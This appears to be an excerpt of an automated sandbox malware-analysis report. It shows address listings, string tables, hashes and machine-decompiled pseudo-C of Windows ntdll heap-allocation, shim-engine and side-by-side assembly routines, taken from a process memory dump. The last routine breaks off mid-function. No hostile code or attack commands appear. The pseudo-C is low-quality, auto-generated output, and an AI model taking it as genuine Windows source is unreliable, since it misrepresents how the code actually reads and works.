                                                                                                                    0x0586b3b1
                                                                                                                    0x058b8238
                                                                                                                    0x00000000
                                                                                                                    0x058b8238
                                                                                                                    0x0586b3bb
                                                                                                                    0x0586b3c0
                                                                                                                    0x0586b3c3
                                                                                                                    0x0586b3c5
                                                                                                                    0x0586b3c7
                                                                                                                    0x0586b3c9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0586b3cf
                                                                                                                    0x00000000
                                                                                                                    0x0586b10f
                                                                                                                    0x0586b117
                                                                                                                    0x0586b123
                                                                                                                    0x0586b129
                                                                                                                    0x0586b12d
                                                                                                                    0x0586b144
                                                                                                                    0x0586b154
                                                                                                                    0x0586b160
                                                                                                                    0x0586b32d
                                                                                                                    0x0586b32d
                                                                                                                    0x0586b332
                                                                                                                    0x058b81e4
                                                                                                                    0x0586b338
                                                                                                                    0x0586b338
                                                                                                                    0x0586b338
                                                                                                                    0x0586b332
                                                                                                                    0x0586b16a
                                                                                                                    0x0586b173
                                                                                                                    0x0586b342
                                                                                                                    0x0586b347
                                                                                                                    0x058b81ee
                                                                                                                    0x00000000
                                                                                                                    0x058b81ee
                                                                                                                    0x0586b34f
                                                                                                                    0x0586b35c
                                                                                                                    0x0586b366
                                                                                                                    0x0586b372
                                                                                                                    0x0586b381
                                                                                                                    0x0586b383
                                                                                                                    0x0586b385
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0586b38e
                                                                                                                    0x0586b391
                                                                                                                    0x0586b393
                                                                                                                    0x0586b39e
                                                                                                                    0x0586b39e
                                                                                                                    0x0586b39e
                                                                                                                    0x0586b3a0
                                                                                                                    0x0586b3a0
                                                                                                                    0x00000000
                                                                                                                    0x0586b3a0
                                                                                                                    0x0586b395
                                                                                                                    0x0586b39c
                                                                                                                    0x0586b406
                                                                                                                    0x00000000
                                                                                                                    0x0586b406
                                                                                                                    0x00000000
                                                                                                                    0x0586b179
                                                                                                                    0x0586b179
                                                                                                                    0x0586b179
                                                                                                                    0x0586b17c
                                                                                                                    0x0586b17e
                                                                                                                    0x0586b180
                                                                                                                    0x058b82d2
                                                                                                                    0x058b82d2
                                                                                                                    0x058b82d9
                                                                                                                    0x058b82db
                                                                                                                    0x058b82f3
                                                                                                                    0x058b82f8
                                                                                                                    0x058b82fb
                                                                                                                    0x058b8302
                                                                                                                    0x058b8308
                                                                                                                    0x058b8308
                                                                                                                    0x0586b2d8
                                                                                                                    0x0586b2dc
                                                                                                                    0x0586b2e5
                                                                                                                    0x0586b2e5
                                                                                                                    0x0586b2f2
                                                                                                                    0x0586b186
                                                                                                                    0x0586b188
                                                                                                                    0x0586b1ae
                                                                                                                    0x0586b1b2
                                                                                                                    0x0586b3dc
                                                                                                                    0x0586b3e3
                                                                                                                    0x0586b3eb
                                                                                                                    0x0586b3eb
                                                                                                                    0x0586b1be
                                                                                                                    0x0586b3f5
                                                                                                                    0x0586b3f5
                                                                                                                    0x0586b1c4
                                                                                                                    0x0586b1c4
                                                                                                                    0x0586b1c7
                                                                                                                    0x0586b1c9
                                                                                                                    0x00000000
                                                                                                                    0x0586b1cf
                                                                                                                    0x0586b1cf
                                                                                                                    0x0586b1d2
                                                                                                                    0x00000000
                                                                                                                    0x0586b1d2
                                                                                                                    0x0586b1c9
                                                                                                                    0x0586b180
                                                                                                                    0x0586b173

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                    • API String ID: 0-122214566
                                                                                                                    • Opcode ID: 3df91a96b10499cb60541ff7a813a97c9cea8842037ad3c265aaf7bd94319086
                                                                                                                    • Instruction ID: 25feb4fe4d049238e982c2aa9583fc64d8629f099750e56a5e6c5e4eb4b4dbca
                                                                                                                    • Opcode Fuzzy Hash: 3df91a96b10499cb60541ff7a813a97c9cea8842037ad3c265aaf7bd94319086
                                                                                                                    • Instruction Fuzzy Hash: DBC14731B04219ABDF25DB68C895BBE7BAABF45309F144069EC02DB390EBB4DC44C791
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058FF0A5 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 62%
                                                                                                                    			E058FF0A5(void* __ebx, signed int* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed char _t105;
				signed int _t106;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				short* _t134;
				short _t135;
				signed char _t153;
				signed int* _t158;
				short* _t169;
				signed int _t174;
				signed int _t184;
				signed int _t185;
				intOrPtr* _t190;
				void* _t191;

				_push(0x3c);
				_push(0x592d320);
				E058A7BE4(__ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
				 *((char*)(_t191 - 0x19)) = 0;
				 *(_t191 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *(_t191 - 4) = 0;
					 *(_t191 - 4) = 1;
					_t87 = E05847662("RtlAllocateHeap");
					__eflags = _t87;
					if(_t87 == 0) {
						L46:
						 *(_t191 - 0x24) = 0;
						L47:
						 *(_t191 - 4) = 0;
						 *(_t191 - 4) = 0xfffffffe;
						E058FF3F9();
						_t89 =  *(_t191 - 0x24);
						goto L48;
					}
					_t153 =  *(__ecx + 0x44) | __edx;
					 *(_t191 - 0x2c) = _t153;
					_t183 = _t153 | 0x10000100;
					 *(_t191 - 0x34) = _t153 | 0x10000100;
					_t174 =  *(_t191 + 8);
					__eflags = _t174;
					 *(_t191 - 0x20) = _t174;
					if(_t174 == 0) {
						 *(_t191 - 0x20) = 1;
					}
					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
					__eflags = _t92 - 0x10;
					if(_t92 < 0x10) {
						_t92 = 0x10;
					}
					_t93 = _t92 + 8;
					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
					__eflags = _t93 - _t174;
					if(_t93 < _t174) {
						L42:
						_t94 =  *[fs:0x30];
						__eflags =  *(_t94 + 0xc);
						if( *(_t94 + 0xc) == 0) {
							_push("HEAP: ");
							E0584B910();
						} else {
							E0584B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t188 + 0x78)));
						E0584B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
						goto L46;
					} else {
						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
							goto L42;
						}
						__eflags = _t153 & 0x00000001;
						if((_t153 & 0x00000001) == 0) {
							E0585FED0( *((intOrPtr*)(_t188 + 0xc8)));
							 *((char*)(_t191 - 0x19)) = 1;
							_t183 =  *(_t191 - 0x2c) | 0x10000101;
							__eflags = _t183;
							 *(_t191 - 0x34) = _t183;
						}
						E05900835(_t188, 0);
						_t184 = E05865D90(_t188, _t188, _t183,  *(_t191 + 8));
						 *(_t191 - 0x24) = _t184;
						_t176 = 1;
						E05900D24(_t188);
						__eflags = _t184;
						if(_t184 == 0) {
							goto L47;
						} else {
							_t185 = _t184 + 0xfffffff8;
							__eflags =  *((char*)(_t185 + 7)) - 5;
							if( *((char*)(_t185 + 7)) == 5) {
								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
								__eflags = _t185;
							}
							_t158 = _t185;
							 *(_t191 - 0x38) = _t185;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
								if(__eflags != 0) {
									_push(_t158);
									_t176 = _t185;
									E0590D646(0, _t188, _t185, _t185, _t188, __eflags);
								}
							}
							__eflags =  *(_t185 + 2) & 0x00000002;
							if(( *(_t185 + 2) & 0x00000002) == 0) {
								_t105 =  *(_t185 + 3);
								 *(_t191 - 0x1a) = _t105;
								_t106 = _t105 & 0x000000ff;
							} else {
								_t134 = E05883AE9(_t185);
								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
								__eflags =  *(_t188 + 0x40) & 0x08000000;
								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
									 *_t134 = 0;
								} else {
									_t135 = E0587FDB9(1, _t176);
									_t169 =  *((intOrPtr*)(_t191 - 0x28));
									 *_t169 = _t135;
									_t134 = _t169;
								}
								_t45 = _t134 + 2; // 0xffff
								_t106 =  *_t45 & 0x0000ffff;
							}
							 *(_t191 - 0x2c) = _t106;
							 *(_t191 - 0x20) = _t106;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *_t185;
							}
							__eflags =  *(_t188 + 0x40) & 0x20000000;
							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E05900835(_t188, 0);
							}
							__eflags =  *(_t191 - 0x24) -  *0x59447c0; // 0x0
							_t108 =  *[fs:0x30];
							if(__eflags != 0) {
								_t109 =  *(_t108 + 0x68);
								 *(_t191 - 0x44) = _t109;
								__eflags = _t109 & 0x00000800;
								if((_t109 & 0x00000800) == 0) {
									goto L47;
								}
								_t110 =  *(_t191 - 0x2c);
								__eflags = _t110;
								if(_t110 == 0) {
									goto L47;
								}
								__eflags = _t110 -  *0x59447c4; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x59447c6; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								_t112 =  *[fs:0x30];
								__eflags =  *(_t112 + 0xc);
								if( *(_t112 + 0xc) == 0) {
									_push("HEAP: ");
									E0584B910();
								} else {
									E0584B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E058F823A(_t188,  *(_t191 - 0x20)));
								_push( *(_t191 + 8));
								E0584B910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
								goto L32;
							} else {
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E0584B910();
								} else {
									E0584B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t191 + 8));
								E0584B910("Just allocated block at %p for %Ix bytes\n",  *0x59447c0);
								L32:
								_t116 =  *[fs:0x30];
								__eflags =  *((char*)(_t116 + 2));
								if( *((char*)(_t116 + 2)) != 0) {
									 *0x59447a1 = 1;
									 *0x5944100 = 0;
									asm("int3");
									 *0x59447a1 = 0;
								}
								goto L47;
							}
						}
					}
				} else {
					_t190 =  *0x5943748; // 0x0
					 *0x59491e0(__ecx, __edx,  *(_t191 + 8));
					_t89 =  *_t190();
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
					return _t89;
				}
			}

























                                                                                                                    0x058ff0a5
                                                                                                                    0x058ff0a7
                                                                                                                    0x058ff0ac
                                                                                                                    0x058ff0b3
                                                                                                                    0x058ff0b5
                                                                                                                    0x058ff0ba
                                                                                                                    0x058ff0bd
                                                                                                                    0x058ff0c7
                                                                                                                    0x058ff0e3
                                                                                                                    0x058ff0e6
                                                                                                                    0x058ff0f4
                                                                                                                    0x058ff0f9
                                                                                                                    0x058ff0fb
                                                                                                                    0x058ff3d2
                                                                                                                    0x058ff3d2
                                                                                                                    0x058ff3d5
                                                                                                                    0x058ff3d5
                                                                                                                    0x058ff3d8
                                                                                                                    0x058ff3df
                                                                                                                    0x058ff3e4
                                                                                                                    0x00000000
                                                                                                                    0x058ff3e4
                                                                                                                    0x058ff104
                                                                                                                    0x058ff106
                                                                                                                    0x058ff10b
                                                                                                                    0x058ff111
                                                                                                                    0x058ff114
                                                                                                                    0x058ff117
                                                                                                                    0x058ff119
                                                                                                                    0x058ff11c
                                                                                                                    0x058ff11e
                                                                                                                    0x058ff11e
                                                                                                                    0x058ff12e
                                                                                                                    0x058ff134
                                                                                                                    0x058ff137
                                                                                                                    0x058ff13b
                                                                                                                    0x058ff13b
                                                                                                                    0x058ff13c
                                                                                                                    0x058ff13f
                                                                                                                    0x058ff142
                                                                                                                    0x058ff144
                                                                                                                    0x058ff350
                                                                                                                    0x058ff350
                                                                                                                    0x058ff356
                                                                                                                    0x058ff359
                                                                                                                    0x058ff378
                                                                                                                    0x058ff37d
                                                                                                                    0x058ff35b
                                                                                                                    0x058ff370
                                                                                                                    0x058ff375
                                                                                                                    0x058ff383
                                                                                                                    0x058ff38e
                                                                                                                    0x00000000
                                                                                                                    0x058ff14a
                                                                                                                    0x058ff14a
                                                                                                                    0x058ff14d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058ff153
                                                                                                                    0x058ff156
                                                                                                                    0x058ff15e
                                                                                                                    0x058ff163
                                                                                                                    0x058ff16a
                                                                                                                    0x058ff16a
                                                                                                                    0x058ff170
                                                                                                                    0x058ff170
                                                                                                                    0x058ff177
                                                                                                                    0x058ff186
                                                                                                                    0x058ff188
                                                                                                                    0x058ff18b
                                                                                                                    0x058ff18f
                                                                                                                    0x058ff194
                                                                                                                    0x058ff196
                                                                                                                    0x00000000
                                                                                                                    0x058ff19c
                                                                                                                    0x058ff19c
                                                                                                                    0x058ff19f
                                                                                                                    0x058ff1a3
                                                                                                                    0x058ff1ac
                                                                                                                    0x058ff1ac
                                                                                                                    0x058ff1ac
                                                                                                                    0x058ff1ae
                                                                                                                    0x058ff1b0
                                                                                                                    0x058ff1b3
                                                                                                                    0x058ff1b6
                                                                                                                    0x058ff1bb
                                                                                                                    0x058ff1c5
                                                                                                                    0x058ff1c8
                                                                                                                    0x058ff1ca
                                                                                                                    0x058ff1cb
                                                                                                                    0x058ff1cf
                                                                                                                    0x058ff1cf
                                                                                                                    0x058ff1c8
                                                                                                                    0x058ff1d4
                                                                                                                    0x058ff1d8
                                                                                                                    0x058ff208
                                                                                                                    0x058ff20b
                                                                                                                    0x058ff20e
                                                                                                                    0x058ff1da
                                                                                                                    0x058ff1dc
                                                                                                                    0x058ff1e1
                                                                                                                    0x058ff1e6
                                                                                                                    0x058ff1ed
                                                                                                                    0x058ff1ff
                                                                                                                    0x058ff1ef
                                                                                                                    0x058ff1f0
                                                                                                                    0x058ff1f5
                                                                                                                    0x058ff1f8
                                                                                                                    0x058ff1fb
                                                                                                                    0x058ff1fb
                                                                                                                    0x058ff202
                                                                                                                    0x058ff202
                                                                                                                    0x058ff202
                                                                                                                    0x058ff211
                                                                                                                    0x058ff214
                                                                                                                    0x058ff218
                                                                                                                    0x058ff21b
                                                                                                                    0x058ff227
                                                                                                                    0x058ff22d
                                                                                                                    0x058ff22d
                                                                                                                    0x058ff22d
                                                                                                                    0x058ff22f
                                                                                                                    0x058ff236
                                                                                                                    0x058ff238
                                                                                                                    0x058ff23c
                                                                                                                    0x058ff23c
                                                                                                                    0x058ff244
                                                                                                                    0x058ff24a
                                                                                                                    0x058ff250
                                                                                                                    0x058ff2be
                                                                                                                    0x058ff2c1
                                                                                                                    0x058ff2c4
                                                                                                                    0x058ff2c9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058ff2cf
                                                                                                                    0x058ff2d2
                                                                                                                    0x058ff2d5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058ff2db
                                                                                                                    0x058ff2e2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058ff2ec
                                                                                                                    0x058ff2f3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058ff2f9
                                                                                                                    0x058ff2ff
                                                                                                                    0x058ff302
                                                                                                                    0x058ff321
                                                                                                                    0x058ff326
                                                                                                                    0x058ff304
                                                                                                                    0x058ff319
                                                                                                                    0x058ff31e
                                                                                                                    0x058ff337
                                                                                                                    0x058ff338
                                                                                                                    0x058ff343
                                                                                                                    0x00000000
                                                                                                                    0x058ff252
                                                                                                                    0x058ff252
                                                                                                                    0x058ff255
                                                                                                                    0x058ff274
                                                                                                                    0x058ff279
                                                                                                                    0x058ff257
                                                                                                                    0x058ff26c
                                                                                                                    0x058ff271
                                                                                                                    0x058ff27f
                                                                                                                    0x058ff28d
                                                                                                                    0x058ff295
                                                                                                                    0x058ff295
                                                                                                                    0x058ff29b
                                                                                                                    0x058ff29f
                                                                                                                    0x058ff2a5
                                                                                                                    0x058ff2ac
                                                                                                                    0x058ff2b2
                                                                                                                    0x058ff2b3
                                                                                                                    0x058ff2b3
                                                                                                                    0x00000000
                                                                                                                    0x058ff29f
                                                                                                                    0x058ff250
                                                                                                                    0x058ff196
                                                                                                                    0x058ff0c9
                                                                                                                    0x058ff0ce
                                                                                                                    0x058ff0d6
                                                                                                                    0x058ff0dc
                                                                                                                    0x058ff3e7
                                                                                                                    0x058ff3ea
                                                                                                                    0x058ff3f6
                                                                                                                    0x058ff3f6

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                    • API String ID: 0-1745908468
                                                                                                                    • Opcode ID: c6fba11f4896ef149333d37572abf2145b3ef4abb62e6ba17b72e4cd64050a96
                                                                                                                    • Instruction ID: becccb92f0dd8fae56bd199a5e78894b233b7f5de57281f4ab8d7912cff98ffc
                                                                                                                    • Opcode Fuzzy Hash: c6fba11f4896ef149333d37572abf2145b3ef4abb62e6ba17b72e4cd64050a96
                                                                                                                    • Instruction Fuzzy Hash: 1F91EC35A04648AFDB12DFA8C444AAEBBF2FF49714F088459EE46EB291CB759D41CF10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584640D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 46%
                                                                                                                    			E0584640D(void* __ecx) {
				signed int _v8;
				void* _v12;
				void* _v536;
				void* _v548;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				void* _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				void* _t109;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x594b370 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_t49 = 0x18;
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = E05846C11( &_v788,  &_v876, _t109);
				if(_t52 < 0) {
					_t85 =  *0x59437c0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = E0584BA80(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return E05894B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa35);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E058CE692();
					_t85 =  *0x59437c0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				E0586E8A6(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = E05846B45( &_v792,  &_v872, 0,  &_v892);
				if(_v804 != 0) {
					E0587E7E0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x59437c0; // 0x0
					__eflags = _t61 & 0x00000003;
					if((_t61 & 0x00000003) != 0) {
						E058CE692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x59437c0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x5945d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					E05887DF6( *((intOrPtr*)(_t108 + 0xc)));
					E0586D3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = E05846868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
					if(_t67 < 0) {
						_t85 =  *0x59437c0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa56);
						goto L11;
					}
					_t104 =  *0x5949208; // 0x0
					_v872 = _t108 + 0x178;
					_v876 = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x5945b24; // 0x5291e18
					asm("ror esi, cl");
					 *0x59491e0( &_v876, _t71 + 0x24, _t99, 0x20);
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E05846565( *((intOrPtr*)(_t108 + 0x14)));
						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
							E05863BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
						}
					}
					goto L6;
				}
			}









































                                                                                                                    0x05846415
                                                                                                                    0x05846422
                                                                                                                    0x0584642e
                                                                                                                    0x0584642f
                                                                                                                    0x05846434
                                                                                                                    0x0584643a
                                                                                                                    0x0584643b
                                                                                                                    0x05846440
                                                                                                                    0x05846446
                                                                                                                    0x0584644e
                                                                                                                    0x05846458
                                                                                                                    0x05846460
                                                                                                                    0x05846465
                                                                                                                    0x0584646c
                                                                                                                    0x058a9770
                                                                                                                    0x058a9776
                                                                                                                    0x058a9779
                                                                                                                    0x058a97b3
                                                                                                                    0x058a97b3
                                                                                                                    0x058a97dd
                                                                                                                    0x058a97dd
                                                                                                                    0x058a97e3
                                                                                                                    0x058a97e3
                                                                                                                    0x05846542
                                                                                                                    0x05846542
                                                                                                                    0x0584654a
                                                                                                                    0x058a982b
                                                                                                                    0x058a982b
                                                                                                                    0x05846557
                                                                                                                    0x05846558
                                                                                                                    0x05846559
                                                                                                                    0x05846564
                                                                                                                    0x05846564
                                                                                                                    0x058a977b
                                                                                                                    0x058a977c
                                                                                                                    0x058a9781
                                                                                                                    0x058a9783
                                                                                                                    0x058a9788
                                                                                                                    0x058a97a0
                                                                                                                    0x058a97a0
                                                                                                                    0x058a97a5
                                                                                                                    0x058a97aa
                                                                                                                    0x058a97b0
                                                                                                                    0x00000000
                                                                                                                    0x058a97b0
                                                                                                                    0x0584647e
                                                                                                                    0x0584648b
                                                                                                                    0x05846498
                                                                                                                    0x0584649e
                                                                                                                    0x058a97ed
                                                                                                                    0x058a97ed
                                                                                                                    0x058464a4
                                                                                                                    0x058464a6
                                                                                                                    0x058a97f7
                                                                                                                    0x058a97fc
                                                                                                                    0x058a97fe
                                                                                                                    0x058a97ce
                                                                                                                    0x058a97d3
                                                                                                                    0x058a97d8
                                                                                                                    0x058a97d8
                                                                                                                    0x058a97db
                                                                                                                    0x00000000
                                                                                                                    0x058464ac
                                                                                                                    0x058464b0
                                                                                                                    0x058464be
                                                                                                                    0x058464c3
                                                                                                                    0x058464cc
                                                                                                                    0x058464d1
                                                                                                                    0x058464d8
                                                                                                                    0x058a9802
                                                                                                                    0x058a9808
                                                                                                                    0x058a980b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058a978f
                                                                                                                    0x058a9790
                                                                                                                    0x058a9795
                                                                                                                    0x058a9796
                                                                                                                    0x058a979b
                                                                                                                    0x00000000
                                                                                                                    0x058a979b
                                                                                                                    0x058464de
                                                                                                                    0x058464eb
                                                                                                                    0x058464f1
                                                                                                                    0x058464f9
                                                                                                                    0x05846507
                                                                                                                    0x05846510
                                                                                                                    0x0584651c
                                                                                                                    0x05846526
                                                                                                                    0x0584652c
                                                                                                                    0x0584653c
                                                                                                                    0x058a981d
                                                                                                                    0x058a981d
                                                                                                                    0x0584653c
                                                                                                                    0x00000000
                                                                                                                    0x05846526

                                                                                                                    Strings
                                                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 058A97B9
                                                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 058A977C
                                                                                                                    • LdrpInitShimEngine, xrefs: 058A9783, 058A9796, 058A97BF
                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 058A97A0, 058A97C9
                                                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 058A9790
                                                                                                                    • apphelp.dll, xrefs: 05846446
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                    • API String ID: 0-204845295
                                                                                                                    • Opcode ID: 514779fe2aa5b8ae087b4d2ecba9fb0e4c7893db11ffe7e69e50f76084d057b6
                                                                                                                    • Instruction ID: 8b3a97fbeaddbc4927a83864af73c691028873d3937cad0f6962fee397229075
                                                                                                                    • Opcode Fuzzy Hash: 514779fe2aa5b8ae087b4d2ecba9fb0e4c7893db11ffe7e69e50f76084d057b6
                                                                                                                    • Instruction Fuzzy Hash: 83519C7620C3089BE721DF28D896E6B7BE9FB84644F000919FD96D7260EA34DD44CF92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05882594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 53%
                                                                                                                    			E05882594(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				char _v16;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr* _t34;
				signed int _t35;
				void* _t38;
				signed int _t41;
				void* _t43;

				_t38 = __edx;
				_t35 = __ecx;
				_t21 =  *[fs:0x30];
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(__edx == 0x582120c) {
					E058DEF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlGetAssemblyStorageRoot");
					goto L23;
				} else {
					_t34 = _a8;
					if(_t34 != 0) {
						 *_t34 = 0;
					}
					_t41 = _a4;
					if((_t35 & 0xfffffffc) != 0 || _t41 < 1 || _t34 == 0) {
						_push(E05882C10);
						_push(_t34);
						_push(_t41);
						_push(_t35);
